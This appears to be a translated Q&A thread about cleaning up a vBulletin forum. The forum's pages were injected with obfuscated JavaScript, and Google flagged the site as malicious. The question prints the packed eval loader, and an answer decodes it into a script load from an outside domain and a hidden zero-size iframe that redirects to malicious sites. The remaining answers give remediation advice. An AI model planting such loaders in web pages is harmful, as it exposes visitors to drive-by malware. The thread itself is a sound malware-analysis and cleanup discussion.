0

私の Web サイト 3dsforums.com は、マルウェアを含む攻撃サイトとしてマークされています。Google Webmaster Tools によると、これはすべてのページに挿入された疑わしいコードです。

<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>

そのため、2 つの質問があります。

これは実際に問題のあるコードですか?

どうすれば削除できますか?

vBulletin のテンプレートや phpmyadmin を介してそれを見つけることができないようです。そのため、どうすればよいかわかりません。

助けてくれてありがとう。

4

4 に答える 4

4

JS Beautifierはこれを次のように解凍します。

var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);

疑わしいように見えるので (誰がそれを難読化するでしょうか?)、私はそう思います。それは問題であり、削除する必要があります。

編集:悪意のあるサイトが復旧したので、残りを分析できますiframe:

var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);

に追加するのはちょっと奇妙headです。

悪用可能性があまり高くない場合、in.cgiスクリプトは Google にリダイレクトするように見えます。User-Agentそうしないと、別の悪意のある Web サイトにリダイレクトされます。

iframe多くの sで分岐し続けます。それらの多くは何もしません (ただし、その時点ではUser-AgentWinXP 上の MSIE 6 のみを試していました) が、最終的には 2 つの Java アプレットを作成することになりました。それらを逆コンパイルしたところ、すべての名前が壊れていたので、それが何をしているのかを理解しようとはしませんでした。

于 2012-02-05T23:18:40.603 に答える
1

最初にすべきことは、FTP または SSH のログインとパスワードを変更することです。

上記は FTP エクスプロイトのようです。OS の更新が古いか、全世界にファイルへの書き込みを許可しているようです。

ファイルを上書きしても、問題が再発する可能性があります。だから私は強くチェックすることをお勧めします

  1. 問題のファイルの最終更新日をメモします。
  2. FTP、SSH、アクセスログをチェックして、怪しいものがないか確認してください。1a. サイトのすべてのファイルへの書き込みアクセスをすぐに削除します。これは、同様の攻撃から身を守るための予防策として行ってください。1b. バックアップからファイルを上書きする
  3. 使用しているApacheまたはWebサーバーに保留中の更新がない場合。
  4. あなたのウェブサイトのファイル許可を確認してください
  5. FTP パスワードをすぐに変更する

アドバイス: パスワードを強力なものに変更してください。例 KLioof*(&^paswl

于 2012-02-06T00:13:32.707 に答える
0

実際には includes/functions.php の 6844 行目と 6845 行目に隠れていましたが、2 行は次のように置き換え</head>られていました。their script+</head>

見つけるのが難しく、賢いものでもあります。

于 2012-02-08T02:50:00.457 に答える
0

この問題を解決しました。サイト ファイル内の疑わしい文字列を含むBase64関数を見つけて削除する必要があります。このスクリプトを文字列からデコードします。

于 2012-02-10T11:15:38.160 に答える